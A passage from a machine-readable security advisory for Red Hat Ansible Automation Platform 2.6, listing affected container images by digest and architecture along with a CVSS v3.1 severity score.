"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
